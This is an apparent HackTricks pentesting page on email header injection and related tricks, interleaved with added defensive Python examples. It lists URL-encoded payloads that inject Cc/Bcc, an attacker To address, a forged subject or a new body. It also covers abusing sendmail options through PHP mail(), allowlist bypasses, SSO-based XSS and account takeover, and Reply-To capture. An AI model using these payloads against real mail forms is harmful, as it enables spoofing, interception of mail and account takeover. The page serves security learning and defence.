hacktricks/pentesting-web/email-injections.md


# Email Injections
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
{% hint style="success" %}
Learn and practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn and practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Inject in sent e-mail
### Inject Cc and Bcc after sender argument
```
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
```
The message will be sent to the recipient and recipient1 accounts.
### Inject argument
```
From:sender@domain.com%0ATo:attacker@domain.com
```
The message will be sent to the original recipient and to the attacker account.
### Inject Subject argument
```
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
```
The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.
### Change the body of the message
Inject two line feeds, then write your message to change the body of the message.
```
From:sender@domain.com%0A%0AMy%20New%20Fake%20Message.
```
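The four injections above (Cc/Bcc, To, Subject and body) all rely on the same thing: a line feed inside a user-supplied header value. The following Python script is an added example, not code from HackTricks. It URL-decodes the page's payloads, concatenates them into a header block the way a vulnerable mailer would, and parses the result so the extra headers become visible; it then shows one check (`safe_header_value`, an assumed name) that rejects such values. The `victim@example.org` recipient and the `naive_message`/`parse_naive` helper names are constructed for the example.

```python
"""Added example, not code from the HackTricks page: the page's four payloads,
fed through a naive header builder, show what the receiving parser sees, and
safe_header_value() is one check that stops them. Names are assumptions."""
from email import message_from_string
from email.message import Message
from urllib.parse import unquote

# The page's payloads, exactly as a form would submit them (URL-encoded).
CC_BCC_PAYLOAD = "sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com"
TO_PAYLOAD = "sender@domain.com%0ATo:attacker@domain.com"
SUBJECT_PAYLOAD = "sender@domain.com%0ASubject:This is%20Fake%20Subject"
BODY_PAYLOAD = "sender@domain.com%0A%0AMy%20New%20Fake%20Message."


def naive_message(from_field: str, to: str = "victim@example.org") -> str:
    """Vulnerable pattern: the decoded form field is concatenated straight into
    the header block, so a LF inside it starts a new header line (or, with two
    LFs, ends the header block and starts a new body)."""
    return (
        f"From: {unquote(from_field)}\n"
        f"To: {to}\n"
        "Subject: Hello\n"
        "\n"
        "Original body\n"
    )


def parse_naive(from_field: str) -> Message:
    """Parse the built message the way an MTA or mail library would."""
    return message_from_string(naive_message(from_field))


def safe_header_value(form_value: str) -> str:
    """Hardened pattern: refuse any header value that contains a line break or
    NUL after decoding. Refusing (rather than silently stripping) keeps the
    attempt visible in logs and leaves nothing for encoding tricks to survive."""
    value = unquote(form_value)
    if any(c in value for c in ("\r", "\n", "\x00")):
        raise ValueError("header injection attempt: control character in header value")
    return value


if __name__ == "__main__":
    for name, payload in [("Cc/Bcc", CC_BCC_PAYLOAD), ("To", TO_PAYLOAD),
                          ("Subject", SUBJECT_PAYLOAD), ("Body", BODY_PAYLOAD)]:
        msg = parse_naive(payload)
        print(f"{name}: headers={msg.items()} body={msg.get_payload()!r}")
        try:
            safe_header_value(payload)
        except ValueError as err:
            print(f"{name}: rejected ({err})")
```

Running the script prints, for each payload, the header list the parser recovered (the injected `Cc`, `Bcc`, second `To` or second `Subject`, or the replaced body) followed by the rejection from the hardened check. The check works on the decoded value because that is what the application sees after the web framework has handled the form.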
### PHP mail() function exploitation
```bash
# The function has the following definition:
php --rf mail
Function [ <internal:standard> function mail ] {

  - Parameters [5] {
    Parameter #0 [ <required> $to ]
    Parameter #1 [ <required> $subject ]
    Parameter #2 [ <required> $message ]
    Parameter #3 [ <optional> $additional_headers ]
    Parameter #4 [ <optional> $additional_parameters ]
  }
}
```
#### The 5th parameter ($additional\_parameters)

This section is about **how this parameter can be abused assuming an attacker controls it**.

This parameter is appended to the command line PHP uses to invoke the sendmail binary. It is, however, sanitised with the function `escapeshellcmd($additional_parameters)`.

An attacker can **inject extra parameters for sendmail** in this case.

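As an added illustration of the defensive side of the 5th parameter (not the page's code and not PHP's): never hand caller-controlled text to the sendmail command line. Validate an envelope sender against a narrow pattern and pass it as its own argv element with no shell in between, so no escaping function has to be trusted. `sendmail_argv`, `send` and the regex are assumptions; `-t -i -f` are the basic sendmail flags this page names further down.

```python
"""Added example, not from the page or from PHP: build the sendmail argument
vector with a validated -f envelope sender. Names and the regex are assumptions."""
import re
import subprocess

# Narrow allowlist: one plain address, no whitespace, no leading dash, no
# display name, comment or domain literal. Anything fancier is rejected.
ENVELOPE_SENDER_RE = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+"
)


def sendmail_argv(envelope_sender: str, binary: str = "/usr/sbin/sendmail") -> list[str]:
    """Return the argv for the sendmail binary. -f and its value are separate
    elements and no shell is involved, so whitespace or quotes in the value can
    never split it into additional options."""
    if not ENVELOPE_SENDER_RE.fullmatch(envelope_sender):
        raise ValueError(f"refusing envelope sender {envelope_sender!r}")
    return [binary, "-t", "-i", "-f", envelope_sender]


def send(raw_message: bytes, envelope_sender: str) -> int:
    """Invoke sendmail without a shell; headers and recipients come from the
    message itself (-t). Returns the process exit code."""
    proc = subprocess.run(sendmail_argv(envelope_sender), input=raw_message, check=False)
    return proc.returncode


if __name__ == "__main__":
    print(sendmail_argv("user@example.com"))
    for bad in ("user@example.com -v", "-v@example.com", "user@[127.0.0.1]"):
        try:
            sendmail_argv(bad)
        except ValueError as err:
            print(err)
```

The contrast with the PHP behaviour described above is the execution model: `escapeshellcmd` escapes shell metacharacters but leaves spaces alone, whereas an argv list is passed to the binary unsplit, so the only remaining risk is the value itself, which the regex confines to a single address.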
#### Differences in /usr/sbin/sendmail implementation

The **sendmail** interface is **provided by the MTA email software** (Sendmail, Postfix, Exim etc.) installed on the system. Although the **basic functionality** (such as the -t -i -f parameters) remains the **same** for compatibility reasons, **other functions and parameters** vary greatly depending on the installed MTA.

Here are a few examples of different man pages of the sendmail command:

* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
* Postfix MTA: http://www.postfix.org/mailq.1.html
* Exim MTA: https://linux.die.net/man/8/exim

Depending on the **origin of the sendmail** binary, different options have been discovered that can be abused to **leak files or even execute arbitrary commands**. Check how in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)

## Inject in e-mail name

### Ignored parts of an e-mail

The symbols **+, -** and, in rare cases, **{}** can be used for tagging and are ignored by most e-mail servers

* E.g. john.doe+intigriti@example.com → john.doe@example.com

**Comments between parentheses ()** at the beginning or the end will also be ignored

* E.g. john.doe(intigriti)@example.com → john.doe@example.com

### Whitelist bypass

<figure><img src="../.gitbook/assets/image (812).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>

### Quotes

<figure><img src="../.gitbook/assets/image (626).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>

### IPs
You can also use an IP as the domain name between square brackets:

* john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1]
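To defend against the tag, comment and IP-literal forms above, compare a canonical form of the address rather than the raw string. The Python snippet below is an added example, not from the page; `canonical_address`, `is_domain_literal` and `allowlisted` are assumed names, and the normalisation rules (strip `(comment)`, strip `+tag`, lowercase the domain) are modelled on the page's examples, so they are a starting point rather than what any particular provider does.

```python
"""Added example, not from the page: canonicalise an address before an
allowlist or uniqueness check so that the tag, comment and domain-literal
forms compare as the mailbox they actually reach. Rules are assumptions."""
import re

# RFC 5322 allows (comments) in addresses; most servers drop them, as the page notes.
COMMENT_RE = re.compile(r"\([^()]*\)")


def canonical_address(addr: str) -> str:
    """Drop (comments), drop a +tag from the local part, lowercase the domain."""
    addr = COMMENT_RE.sub("", addr.strip())
    local, sep, domain = addr.rpartition("@")
    if not sep or not local or not domain:
        raise ValueError(f"not an address: {addr!r}")
    local = local.split("+", 1)[0]          # john.doe+intigriti -> john.doe
    return f"{local}@{domain.lower()}"


def is_domain_literal(addr: str) -> bool:
    """True for john.doe@[127.0.0.1] / john.doe@[IPv6:2001:db8::1] style domains."""
    domain = addr.rpartition("@")[2]
    return domain.startswith("[") and domain.endswith("]")


def allowlisted(addr: str, allowed_domains: set[str]) -> bool:
    """Compare the canonical form, never the raw input, and refuse domain
    literals outright: they bypass any hostname-based allowlist."""
    if is_domain_literal(addr):
        return False
    domain = canonical_address(addr).rpartition("@")[2]
    return domain in {d.lower() for d in allowed_domains}


if __name__ == "__main__":
    # Constructed inputs mirroring the page's examples.
    for sample in ("john.doe+intigriti@example.com", "john.doe(intigriti)@example.com",
                   "john.doe@[127.0.0.1]"):
        print(sample, "->", canonical_address(sample), "allowed:", allowlisted(sample, {"example.com"}))
```

Two design points: the allowlist check runs on the canonical string so that two registrations differing only by a tag or a comment collide as they should, and domain literals are refused rather than canonicalised because an IP in brackets can never legitimately match a hostname allowlist.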
### Other vulns

![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)

## Third party SSO

### XSS
Some services like **github** or **salesforce allow** you to create an **email address with an XSS payload in it**. If you can **use these providers to log in to other services** and those services **don't sanitise** the email correctly, you could cause **XSS**.

### Account-Takeover

If an **SSO service** allows you to **create an account without verifying the given email address** (like **salesforce**) and you can then use that account to **log in to a different service** that **trusts** salesforce, you could access any account.\
_Note that salesforce indicates whether the given email was verified or not, so the application should take this information into account._

## Reply-To

You can send an email using _**From: company.com**_ and _**Reply-To: attacker.com**_, and if an **automatic reply** is sent because the email came **from** an **internal address**, the **attacker** may be able to **receive** that **response**.

## Hard Bounce Rate

Certain services, like AWS, work with a threshold known as the **Hard Bounce Rate**, usually set at 10%. This is an important metric, especially for email delivery services. When this rate is exceeded, the service, such as AWS's email service, may be suspended or blocked.

A **hard bounce** refers to an **email** that has been returned to the sender because the recipient's address is invalid or does not exist. This can happen for various reasons, such as the **email** being sent to a non-existent address, to a domain that is not real, or because the recipient's server refuses to accept **emails**.

In the AWS context, if you send 1000 emails and 100 of them come back as hard bounces (for reasons like invalid addresses or domains), this is a 10% hard bounce rate. Reaching or exceeding this rate can cause AWS SES (Simple Email Service) to block or suspend your ability to send emails.

It is crucial to keep the hard bounce rate low to ensure uninterrupted email service and to maintain sender reputation. Monitoring and managing the quality of the email addresses on your mailing lists helps greatly in achieving this.

For more detailed information, the official AWS documentation on handling bounces and complaints can be consulted at [AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types).

## References

* [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)
* [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
* [https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)